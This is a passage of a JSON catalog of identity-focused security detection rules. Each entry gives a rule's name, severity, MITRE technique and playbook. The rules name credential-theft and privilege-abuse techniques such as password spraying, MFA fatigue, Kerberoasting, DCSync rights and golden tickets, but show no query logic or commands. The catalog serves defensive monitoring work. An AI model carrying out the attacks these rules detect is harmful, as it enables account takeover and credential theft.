"tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/idp-metadata-changed.yaml" }, { "id": "det-identity-039", "type": "detection", "name": "Conditional Access Policy Scope Broadened (Less Restrictive)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Conditional Access Policy Scope Broadened (Less Restrictive)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1562.001" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ca-policy-scope-broadened.yaml" }, { "id": "det-identity-040", "type": "detection", "name": "Cross-Tenant Identity Access Granted", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Cross-Tenant Identity Access Granted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1199" ], "log_source": "azure", "playbook": "tpl-cloud-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/federation-cross-tenant-access.yaml" }, { "id": "det-identity-041", "type": "detection", "name": "Password Spray: Single IP, Many Targets, Few Tries Each", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Password Spray: Single IP, Many Targets, Few Tries Each'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1110.003" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-password-spray-many-targets.yaml" }, { "id": "det-identity-042", "type": "detection", "name": "Distributed Password Spray From Many IPs", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Distributed Password Spray From Many IPs'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1110.003" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-password-spray-distributed.yaml" }, { "id": "det-identity-043", "type": "detection", "name": "Credential Stuffing Pattern Against Login Endpoint", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Credential Stuffing Pattern Against Login Endpoint'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1110.004" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-credstuffing-known-breached-list.yaml" }, { "id": "det-identity-044", "type": "detection", "name": "Successful Login After 50+ Recent Failures", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Successful Login After 50+ Recent Failures'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1110.001" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-bruteforce-success-after-failures.yaml" }, { "id": "det-identity-045", "type": "detection", "name": "Impossible Travel: Two Successful Logins <15m, >1000km", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Impossible Travel: Two Successful Logins <15m, >1000km'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-impossible-travel-15m.yaml" }, { "id": "det-identity-046", "type": "detection", "name": "Successful Login From Tor Exit Node", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Successful Login From Tor Exit Node'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1090.003" ], "log_source": "identity", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-tor-exit-login-success.yaml" }, { "id": "det-identity-047", "type": "detection", "name": "Privileged User Login From Anonymising VPN", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged User Login From Anonymising VPN'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1090.003" ], "log_source": "identity", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-anon-vpn-login-priv-user.yaml" }, { "id": "det-identity-048", "type": "detection", "name": "MFA Fatigue Burst Against Single User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'MFA Fatigue Burst Against Single User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1621" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-mfa-fatigue-burst.yaml" }, { "id": "det-identity-049", "type": "detection", "name": "User Denied Push Then Approved Within 60s", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'User Denied Push Then Approved Within 60s'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1621" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-mfa-deny-then-success.yaml" }, { "id": "det-identity-050", "type": "detection", "name": "Account Locked Out 3+ Times In 1 Hour", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Account Locked Out 3+ Times In 1 Hour'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1110" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-account-locked-many-times.yaml" }, { "id": "det-identity-051", "type": "detection", "name": "Authentication Attempt Against Disabled User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Authentication Attempt Against Disabled User'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-disabled-user-auth-attempt.yaml" }, { "id": "det-identity-052", "type": "detection", "name": "Authentication Success For Recently Deleted User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Authentication Success For Recently Deleted User'.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-deleted-user-auth-success.yaml" }, { "id": "det-identity-053", "type": "detection", "name": "MFA Bypass Via Emergency / Backup Code", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'MFA Bypass Via Emergency / Backup Code'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-mfa-bypassed-via-emergency-code.yaml" }, { "id": "det-identity-054", "type": "detection", "name": "FIDO2 Hardware Key Removed From Privileged User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'FIDO2 Hardware Key Removed From Privileged User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "identity", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-fido2-key-removed-priv.yaml" }, { "id": "det-identity-055", "type": "detection", "name": "FIDO2 Key Added And Old Key Removed In Same Session", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'FIDO2 Key Added And Old Key Removed In Same Session'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "identity", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-fido2-key-added-then-removed-old.yaml" }, { "id": "det-identity-056", "type": "detection", "name": "TOTP Secret QR-Code Re-Issued Without Old Factor Removal", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'TOTP Secret QR-Code Re-Issued Without Old Factor Removal'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-totp-secret-revealed.yaml" }, { "id": "det-identity-057", "type": "detection", "name": "Password Policy Min-Length / Complexity Loosened", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Password Policy Min-Length / Complexity Loosened'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "identity", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-static-password-policy-loosened.yaml" }, { "id": "det-identity-058", "type": "detection", "name": "Password History Length Reduced", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Password History Length Reduced'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "identity", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-password-policy-history-reduced.yaml" }, { "id": "det-identity-059", "type": "detection", "name": "Session Timeout Extended For Privileged Group", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Session Timeout Extended For Privileged Group'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "identity", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-session-timeout-extended-priv.yaml" }, { "id": "det-identity-060", "type": "detection", "name": "Login With Headless / Bot User Agent", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Login With Headless / Bot User Agent'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-suspicious-user-agent-login.yaml" }, { "id": "det-identity-061", "type": "detection", "name": "Login From ASN Recently Seen In Credential-Stuffing Activity", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Login From ASN Recently Seen In Credential-Stuffing Activity'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1110.004" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-login-from-known-asn-ddos.yaml" }, { "id": "det-identity-062", "type": "detection", "name": "Privileged User Login From New Country", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged User Login From New Country'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-new-country-priv-user.yaml" }, { "id": "det-identity-063", "type": "detection", "name": "User Login Locale Switched Rapidly", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'User Login Locale Switched Rapidly'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-rapid-language-change.yaml" }, { "id": "det-identity-064", "type": "detection", "name": "Login With Empty User-Agent", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Login With Empty User-Agent'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-empty-useragent-login.yaml" }, { "id": "det-identity-065", "type": "detection", "name": "TOTP Verification Repeatedly Skews Clock", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'TOTP Verification Repeatedly Skews Clock'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "identity", "mitre_techniques": [ "T1110" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-totp-skewed-clock.yaml" }, { "id": "det-identity-066", "type": "detection", "name": "Privileged Role Granted Outside Business Hours", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged Role Granted Outside Business Hours'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-priv-role-grant-out-of-hours.yaml" }, { "id": "det-identity-067", "type": "detection", "name": "User Granted Privileged Role To Themselves", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'User Granted Privileged Role To Themselves'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "identity", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-self-grant-priv-role.yaml" }, { "id": "det-identity-068", "type": "detection", "name": "Privileged Role Granted To Service Account", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged Role Granted To Service Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.004" ], "log_source": "identity", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-priv-role-grant-to-svc-account.yaml" }, { "id": "det-identity-069", "type": "detection", "name": "JIT/PIM Privileged Activation Self-Approved", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'JIT/PIM Privileged Activation Self-Approved'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-pim-activation-self-approval.yaml" }, { "id": "det-identity-070", "type": "detection", "name": "JIT/PIM Activation At Unusual Hour For User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'JIT/PIM Activation At Unusual Hour For User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "identity", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-pim-activation-anomalous-time.yaml" }, { "id": "det-identity-071", "type": "detection", "name": "Privileged Role Grant Burst Across Many Users", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged Role Grant Burst Across Many Users'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "identity", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-priv-role-burst-granted.yaml" }, { "id": "det-identity-072", "type": "detection", "name": "Service Account Used For Interactive Login", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Service Account Used For Interactive Login'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.004" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-svc-account-interactive-login.yaml" }, { "id": "det-identity-073", "type": "detection", "name": "Service Account Login Without MFA In Region That Requires It", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Service Account Login Without MFA In Region That Requires It'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078.004" ], "log_source": "identity", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-svc-account-mfa-skipped.yaml" }, { "id": "det-identity-074", "type": "detection", "name": "New User Granted Privileged Role <24h After Creation", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'New User Granted Privileged Role <24h After Creation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "identity", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-onboard-priv-roles-immediate.yaml" }, { "id": "det-identity-075", "type": "detection", "name": "OAuth App Acting As Privileged User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'OAuth App Acting As Privileged User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1528" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-app-impersonation-priv.yaml" }, { "id": "det-identity-076", "type": "detection", "name": "Privileged Role Removed From Many Users In Burst", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged Role Removed From Many Users In Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1531" ], "log_source": "identity", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-priv-role-removed-bulk.yaml" }, { "id": "det-identity-077", "type": "detection", "name": "Service Account With 5+ Active API Keys", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Service Account With 5+ Active API Keys'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-orphan-svc-acct-many-keys.yaml" }, { "id": "det-identity-078", "type": "detection", "name": "Service Account Key Used From Non-Pipeline IP", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Service Account Key Used From Non-Pipeline IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.004" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-svc-account-key-from-non-pipeline.yaml" }, { "id": "det-identity-079", "type": "detection", "name": "Domain Admin Group Membership Added (AD)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Domain Admin Group Membership Added (AD)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1098.007" ], "log_source": "active-directory", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-domain-admin-added.yaml" }, { "id": "det-identity-080", "type": "detection", "name": "ACL On Sensitive AD Object Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'ACL On Sensitive AD Object Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1484.002" ], "log_source": "active-directory", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-acl-sensitive-changed.yaml" }, { "id": "det-identity-081", "type": "detection", "name": "DCSync Rights Granted Outside Domain Controllers", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'DCSync Rights Granted Outside Domain Controllers'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1003.006" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-dcsync-rights-granted.yaml" }, { "id": "det-identity-082", "type": "detection", "name": "Privileged GPO Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged GPO Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1484.001" ], "log_source": "active-directory", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-gpo-modified-priv.yaml" }, { "id": "det-identity-083", "type": "detection", "name": "AD Domain Trust Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'AD Domain Trust Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1484.002" ], "log_source": "active-directory", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-trust-modified.yaml" }, { "id": "det-identity-084", "type": "detection", "name": "AD Anonymous Logon Allowed Via Null Session", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'AD Anonymous Logon Allowed Via Null Session'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.001" ], "log_source": "active-directory", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-userauth-anonymous-named-pipe.yaml" }, { "id": "det-identity-085", "type": "detection", "name": "AD Account Set With PASSWD_NOTREQD", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'AD Account Set With PASSWD_NOTREQD'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-pwd-not-required.yaml" }, { "id": "det-identity-086", "type": "detection", "name": "Privileged AD Account Set With DONT_EXPIRE_PASSWORD", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged AD Account Set With DONT_EXPIRE_PASSWORD'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-pwd-never-expires-priv.yaml" }, { "id": "det-identity-087", "type": "detection", "name": "Machine Account Quota Exhausted By Single User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Machine Account Quota Exhausted By Single User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1136.001" ], "log_source": "active-directory", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-machine-account-quota-abuse.yaml" }, { "id": "det-identity-088", "type": "detection", "name": "User Removed From Protected Users Group", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'User Removed From Protected Users Group'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "active-directory", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-protected-users-removed.yaml" }, { "id": "det-identity-089", "type": "detection", "name": "AD sIDHistory Attribute Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'AD sIDHistory Attribute Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.002" ], "log_source": "active-directory", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-sidhistory-modified.yaml" }, { "id": "det-identity-090", "type": "detection", "name": "Disabled AD Account Authenticated Successfully", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Disabled AD Account Authenticated Successfully'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.002" ], "log_source": "active-directory", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-userlogon-disabled-account.yaml" }, { "id": "det-identity-091", "type": "detection", "name": "Kerberoasting: TGS Request With RC4_HMAC", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Kerberoasting: TGS Request With RC4_HMAC'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1558.003" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-kerberoasting-tgs-rc4.yaml" }, { "id": "det-identity-092", "type": "detection", "name": "AS-REP Roasting: TGT Without Pre-Auth", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'AS-REP Roasting: TGT Without Pre-Auth'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1558.004" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-asreproast-no-preauth.yaml" }, { "id": "det-identity-093", "type": "detection", "name": "Golden Ticket Indicator: TGT Lifetime > 10h", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Golden Ticket Indicator: TGT Lifetime > 10h'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1558.001" ], "log_source": "active-directory", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-golden-ticket-anomalous-tgt-lifetime.yaml" }, { "id": "det-identity-094", "type": "detection", "name": "Silver Ticket Indicator: TGS Without Matching TGT", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Silver Ticket Indicator: TGS Without Matching TGT'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1558.002" ], "log_source": "active-directory", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-silver-ticket-anomalous-spn.yaml" }, { "id": "det-identity-095", "type": "detection", "name": "Skeleton Key Indicator: Forced Downgrade To DES/RC4", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Skeleton Key Indicator: Forced Downgrade To DES/RC4'. Watch the 1 documented false-positive case before tuning.", "version": 